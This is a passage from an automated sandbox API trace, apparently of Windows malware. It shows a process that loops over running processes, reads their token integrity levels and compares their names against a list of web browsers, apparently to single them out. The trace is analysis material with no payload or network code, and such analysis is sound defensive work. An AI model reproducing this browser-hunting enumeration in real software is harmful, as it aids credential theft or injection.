TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.436] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.436] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.436] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0241.436] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0241.436] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0241.436] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0241.436] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0241.436] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0241.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0241.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0241.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0241.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0241.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0241.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0241.436] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.437] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.437] GetLastError () returned 0x7a [0241.437] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.437] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.437] CloseHandle (hObject=0xb8) returned 1 [0241.437] CloseHandle (hObject=0xb4) returned 1 [0241.437] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.437] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.437] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.437] GetLastError () returned 0x7a [0241.437] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.437] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.437] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.437] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0241.437] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0241.437] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0241.437] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0241.437] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0241.437] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0241.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0xb4 [0241.438] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.438] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.438] GetLastError () returned 0x7a [0241.438] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.438] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.438] CloseHandle (hObject=0xb8) returned 1 [0241.438] CloseHandle (hObject=0xb4) returned 1 [0241.438] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.438] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.438] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.438] GetLastError () returned 0x7a [0241.438] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.438] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.438] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.438] lstrcmpiW (lpString1="firefox.exe", lpString2="dllhost.exe") returned 1 [0241.438] lstrcmpiW (lpString1="chrome.exe", lpString2="dllhost.exe") returned -1 [0241.438] lstrcmpiW (lpString1="opera.exe", lpString2="dllhost.exe") returned 1 [0241.438] lstrcmpiW (lpString1="iexplore.exe", lpString2="dllhost.exe") returned 1 [0241.438] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dllhost.exe") returned 1 [0241.438] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dllhost.exe") returned 1 [0241.438] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.439] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0243.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xbf10) returned 0xc0000004 [0243.446] VirtualAlloc (lpAddress=0x0, dwSize=0xcf10, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0243.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xcf10, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0243.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0243.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0243.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0243.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0243.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0243.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0243.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0243.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0243.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0243.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0243.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0243.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0243.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0243.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0243.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0243.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0243.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0243.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0243.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0243.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0243.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0243.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0243.450] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.450] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.450] GetLastError () returned 0x7a [0243.450] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.450] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.450] CloseHandle (hObject=0xb8) returned 1 [0243.450] CloseHandle (hObject=0xb4) returned 1 [0243.451] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.451] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.451] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.451] GetLastError () returned 0x7a [0243.451] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.451] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.451] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.451] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0243.451] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0243.452] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0243.452] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0243.452] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0243.452] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0243.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0243.452] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.452] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.452] GetLastError () returned 0x7a [0243.452] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.452] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.452] CloseHandle (hObject=0xb8) returned 1 [0243.452] CloseHandle (hObject=0xb4) returned 1 [0243.452] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.453] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.453] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.453] GetLastError () returned 0x7a [0243.453] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.453] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.453] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.453] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0243.453] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0243.453] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0243.453] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0243.453] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0243.453] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0243.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0243.453] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.454] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.454] GetLastError () returned 0x7a [0243.454] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.454] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.454] CloseHandle (hObject=0xb8) returned 1 [0243.454] CloseHandle (hObject=0xb4) returned 1 [0243.454] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.454] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.454] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.454] GetLastError () returned 0x7a [0243.454] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.454] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.454] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.455] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0243.455] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0243.455] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0243.455] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0243.455] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0243.455] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0243.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0243.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0243.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0243.455] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.455] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.455] GetLastError () returned 0x7a [0243.455] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.455] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.456] CloseHandle (hObject=0xb8) returned 1 [0243.456] CloseHandle (hObject=0xb4) returned 1 [0243.456] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.456] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.456] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.456] GetLastError () returned 0x7a [0243.456] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.456] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.456] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.456] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0243.456] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0243.456] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0243.456] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0243.456] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0243.457] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0243.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0243.457] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.457] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.457] GetLastError () returned 0x7a [0243.457] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.457] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.457] CloseHandle (hObject=0xb8) returned 1 [0243.457] CloseHandle (hObject=0xb4) returned 1 [0243.457] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.457] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.457] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.457] GetLastError () returned 0x7a [0243.457] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.457] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.457] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.458] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0243.458] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0243.458] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0243.458] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0243.458] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0243.458] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0243.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0243.458] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.458] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.458] GetLastError () returned 0x7a [0243.458] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.458] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.458] CloseHandle (hObject=0xb8) returned 1 [0243.458] CloseHandle (hObject=0xb4) returned 1 [0243.458] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.458] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: 